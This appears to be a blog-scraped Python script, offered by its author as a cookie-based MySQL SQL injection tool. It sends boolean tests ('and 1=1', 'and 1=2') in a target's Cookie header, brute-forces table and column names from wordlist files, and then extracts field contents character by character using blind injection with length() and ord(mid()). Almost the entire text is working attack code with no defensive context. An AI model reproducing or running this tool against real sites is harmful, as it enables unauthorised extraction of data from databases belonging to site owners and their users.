标签:== argument readline htm start erer user headers add
1 import urllib.request 2 import urllib.parse 3 import urllib.error 4 import http.cookiejar 5 import argparse 6 7 # url=‘http://172.20.10.8/bug/cookie.php‘ 8 url = argparse.ArgumentParser() 9 url.add_argument(‘-u‘,help="-u http://localhost/cookie.php",type=str) 10 url.add_argument(‘-cookie‘,help="-cookie id=xxx",type=str) 11 args = url.parse_args() 12 url = args.u 13 cookie = args.cookie 14 grey = ‘‘‘ 15 ***************************************************** 16 17 SQL mysql_cookie 注入工具 18 作者:Grey_Network 19 20 ***************************************************** 21 ‘‘‘ 22 23 print(grey) 24 25 a = "%20and%201=1" 26 b = "%20and%201=2" 27 header={ 28 ‘User-Agent‘:‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 29 ‘Referer‘:url, 30 ‘Cookie‘:cookie 31 } 32 headera={ 33 ‘User-Agent‘:‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 34 ‘Referer‘:url, 35 ‘Cookie‘:cookie+a 36 } 37 headerb={ 38 ‘User-Agent‘:‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 39 ‘Referer‘:url, 40 ‘Cookie‘:cookie+b 41 } 42 sqlurl = urllib.request.Request(url,headers=header) 43 sqlurl1 = urllib.request.urlopen(sqlurl).read() 44 sqla = urllib.request.Request(url,headers=headera) 45 sqla1 = urllib.request.urlopen(sqla).read() 46 sqlb = urllib.request.Request(url,headers=headerb) 47 sqlb1 = urllib.request.urlopen(sqlb).read() 48 49 50 if sqlurl1 == sqla1 and sqlurl !=sqlb1: 51 table= input("Whether or not the scan table ? Y/n > ") 52 dirt = "table.txt" 53 webdirt=[] 54 with open(dirt) as infile: 55 while True: 56 dirdict = infile.readline().strip() 57 if (len(dirdict) == 0): break 58 webdirt.append(dirdict) 59 if table == "y": 60 for line in webdirt: 61 headert = { 62 ‘User-Agent‘: ‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 63 ‘Referer‘: url, 64 ‘Cookie‘: cookie + "%20and%20exists%20(select%20*%20from%20" + line + ")" 65 } 66 table_scan = urllib.request.Request(url,headers=headert) 67 table_scan1 = urllib.request.urlopen(table_scan).read() 68 if table_scan1 == sqla1 and table_scan1 !=sqlb1: 69 print("table:\n",line) 70 column = input("Whether to scan the field ? Y/n > ") 71 table_file = input("table > ") 72 dirc = "column.txt" 73 webdirc = [] 74 with open(dirc) as infilec: 75 while True: 76 dirdicc = infilec.readline().strip() 77 if (len(dirdicc) == 0): break 78 webdirc.append(dirdicc) 79 if column == "y": 80 for linec in webdirc: 81 headerc = { 82 ‘User-Agent‘: ‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 83 ‘Referer‘: url, 84 ‘Cookie‘: cookie + "%20and%20exists%20(select%20"+linec+"%20from%20" + table_file + ")" 85 } 86 column_scan = urllib.request.Request(url, headers=headerc) 87 column_scan1 = urllib.request.urlopen(column_scan).read() 88 if column_scan1 == sqla1 and column_scan1 != sqlb1: 89 print("column:\n", linec) 90 c1 = input("Do you start guessing ? Y/n > ") 91 column_file = input("column > ") 92 if c1 == "y": 93 o = 0 94 while(o<100): 95 o = o+1 96 oc = str(o) 97 headerc1 = { 98 ‘User-Agent‘: ‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 99 ‘Referer‘: url, 100 ‘Cookie‘: cookie + "%20and%20length("+column_file+")="+oc 101 } 102 c1_scan = urllib.request.Request(url,headers=headerc1) 103 c1_scan1 = urllib.request.urlopen(c1_scan).read() 104 if c1_scan1 == sqla1 and c1_scan1 != sqlb1: 105 106 ca1=0 107 while(ca1<int(oc)): 108 ca1=ca1+1 109 cac1=str(ca1) 110 ca2=0 111 while(ca2<128): 112 ca2=ca2+1 113 cac2 = str(ca2) 114 headerca1 = { 115 ‘User-Agent‘: ‘Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36‘, 116 ‘Referer‘: url, 117 ‘Cookie‘: cookie + "%20and%20ord(mid("+column_file+","+cac1+",1))="+cac2 118 } 119 ca1_scan = urllib.request.Request(url,headers=headerca1) 120 ca1_scan1 = urllib.request.urlopen(ca1_scan).read() 121 if ca1_scan1 == sqla1 and ca1_scan1 != sqlb1: 122 data_dump = chr(int(cac2)) 123 print(data_dump) 124 else: 125 print("很遗憾,无法注入")
标签:== argument readline htm start erer user headers add
原文地址:https://www.cnblogs.com/grey-network/p/9021547.html